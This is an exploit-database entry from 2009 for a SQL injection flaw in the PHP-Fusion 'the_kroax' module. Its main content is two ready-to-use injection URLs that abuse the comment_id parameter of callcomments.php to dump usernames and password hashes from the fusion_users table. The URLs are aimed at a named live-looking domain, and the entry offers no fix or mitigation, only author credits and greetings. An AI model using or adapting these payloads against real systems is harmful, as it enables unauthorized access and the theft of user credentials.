[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability
# Published : 2009-01-11
# Author : FasTWORM
# Previous Title : Weight Loss Recipe Book 3.1 (Auth Bypass) SQL Injection Vuln
# Next Title : Social Engine (browse_classifieds.php s) SQL Injection Vulnerability


PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability
-----------------------------------------------------------------------------------------------------------

[+]Author by : FasTWORM
[+]home: Cyber-Warrior.Org
[+]exploit:
[+]http://www.beylerli.com/infusions/the_kroax/callcomments.php?comment_id=-999'+union+select+0,1905,2,3,user_name,5,6,1905+from+fusion_users/*
[+]http://www.beylerli.com/infusions/the_kroax/callcomments.php?comment_id=-999'+union+select+0,1905,2,3,user_password,5,6,1905+from+fusion_users/*
 
----------------------------------------------------------------------------------------------------------------------
[+]Greetz : BackDooR , Tr-ShaRk , All CW Users
[+]Note   : Bugun Do??um G??n??m :)
----------------------------------------------------------------------------------------------------------------------

# www.Syue.com [2009-01-11]